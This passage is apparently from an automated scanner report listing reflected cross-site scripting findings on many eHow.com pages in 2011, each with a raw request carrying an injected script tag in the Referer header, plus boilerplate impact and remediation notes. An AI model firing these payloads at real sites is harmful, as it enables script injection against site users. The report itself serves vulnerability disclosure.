Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5215115_change-startup-programs-windows-7.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=792c3</script><script>alert(1)</script>e4edbcebfeb
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:56 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 82260
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Change Startup Programs in Windows 7 | eHo ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c9ba</script><script>alert(1)</script>fd2c9cc4bf2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5381925_make-roof-rake.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=2c9ba</script><script>alert(1)</script>fd2c9cc4bf2
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:36 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 74669
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Make a Roof Rake | eHow.com</title> <me ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42857</script><script>alert(1)</script>6ac0b75544c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5521182_avoid-seasonal-affective-disorder-sad.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=42857</script><script>alert(1)</script>6ac0b75544c
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:24 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 87570
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Avoid SAD | eHow.com</title> <meta char ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a5b70</script><script>alert(1)</script>2db931d6be2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_5809012_create-indoor-gardens.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=a5b70</script><script>alert(1)</script>2db931d6be2
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:21 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 78162
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eec4a</script><script>alert(1)</script>7e8c02f9d09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_6469141_improve-english-grammar-skills.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=eec4a</script><script>alert(1)</script>7e8c02f9d09
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:20 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 76462
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Improve English Grammar Skills | eHow.com< ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aabda</script><script>alert(1)</script>31a3c6ca008 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_7496527_resolve-5-common-grammar-problems.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=aabda</script><script>alert(1)</script>31a3c6ca008
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:00 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 83005
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Resolve 5 Common Grammar Problems | eHow.c ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c21a6</script><script>alert(1)</script>d5f8e9adbce was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_7744253_attach-mini-shades-update-chandelier.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=c21a6</script><script>alert(1)</script>d5f8e9adbce
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:15:18 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73804
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Attach Mini Shades to Update a Chandelier ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba04d</script><script>alert(1)</script>b64307eba63 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_7856914_prevent-chimney-fires.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=ba04d</script><script>alert(1)</script>b64307eba63
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:49 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72254
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df4eb</script><script>alert(1)</script>912910bc2c4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /how_9191_program-rca-universal.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=df4eb</script><script>alert(1)</script>912910bc2c4
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:13 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 83616
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>How to Program an RCA Universal Remote Control | ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c74d1</script><script>alert(1)</script>96f99f29a5c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /internet/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=c74d1</script><script>alert(1)</script>96f99f29a5c
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:31 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72741
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Internet - How To Information | eHow.com</title> ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa308</script><script>alert(1)</script>c5f09faead2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /job-search-and-employment/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=aa308</script><script>alert(1)</script>c5f09faead2
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:29 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72494
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Job Search & Employment - How To Information | eH ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ba46</script><script>alert(1)</script>6b620b72d2c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lawn-and-garden/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=1ba46</script><script>alert(1)</script>6b620b72d2c
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:40 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71036
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Lawn & Garden - How To Information | eHow.com</ti ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 459d0</script><script>alert(1)</script>02fd6d9f1ec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /legal/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=459d0</script><script>alert(1)</script>02fd6d9f1ec
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:55 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73439
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Legal - How To Information | eHow.com</title>
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e78a0</script><script>alert(1)</script>8d81708f1d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /list_6515049_common-english-grammar-mistakes.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=e78a0</script><script>alert(1)</script>8d81708f1d3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:16 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73796
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c8b8</script><script>alert(1)</script>9bae81c40d8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /list_7189463_grammar-check-tools.html HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=8c8b8</script><script>alert(1)</script>9bae81c40d8
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:21 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73995
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c7b6</script><script>alert(1)</script>085f8aae691 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /lose-weight/ HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55; Referer: http://www.google.com/search?hl=en&q=2c7b6</script><script>alert(1)</script>085f8aae691
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:17:21 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 59165
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Lose Weight - How To Information | eHow.com</titl ...[SNIP]... obj){ vWin = window.open($(obj).attr("href"),'verisignWindow','height=500,width=560'); if (window.focus){ vWin.focus() } return false; }
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd0e2</script><script>alert(1)</script>e6d76aa30d4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
